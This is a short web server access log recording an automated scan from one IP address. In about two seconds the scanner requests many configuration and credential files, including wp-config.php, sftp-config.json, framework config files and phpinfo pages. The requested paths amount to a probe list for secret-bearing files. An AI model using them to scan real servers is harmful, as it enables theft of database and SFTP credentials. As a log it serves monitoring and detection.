195.211.188.185 - - [28/Sep/2025:03:58:12 +0800] "GET /config/cache.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:12 +0800] "GET /config/development.config.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:12 +0800] "GET /config/config.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:12 +0800] "GET /config/filesystems.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:12 +0800] "GET /application/config/mimes.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:12 +0800] "GET /config/app.default.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:12 +0800] "GET /app/etc/config.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:12 +0800] "GET /config/app_local.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:12 +0800] "GET /application/config/doctypes.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:12 +0800] "GET /config/module.config.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:12 +0800] "GET /config/services.php HTTP/1.1" 404 47 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:13 +0800] "GET /phpinfo.php5 HTTP/1.1" 404 8990 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:14 +0800] "GET /wp-config.php HTTP/1.1" 200 31 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:14 +0800] "GET /index.php/phpinfo HTTP/1.1" 301 5 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:14 +0800] "GET /phpinfo.php4 HTTP/1.1" 404 8991 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:14 +0800] "GET /config/php.ini HTTP/1.1" 404 8991 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:14 +0800] "GET /app_dev.php/_profiler/phpinfo HTTP/1.1" 404 8991 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:14 +0800] "GET /public/client/planinfo HTTP/1.1" 404 8991 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:14 +0800] "GET /sftp-config.json HTTP/1.1" 404 8991 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:14 +0800] "GET /.ssh/sftp-config.json HTTP/1.1" 404 8991 "-" "Go-http-client/1.1"
195.211.188.185 - - [28/Sep/2025:03:58:14 +0800] "GET /wp-config.php.old HTTP/1.1" 404 8991 "-" "Go-http-client/1.1"
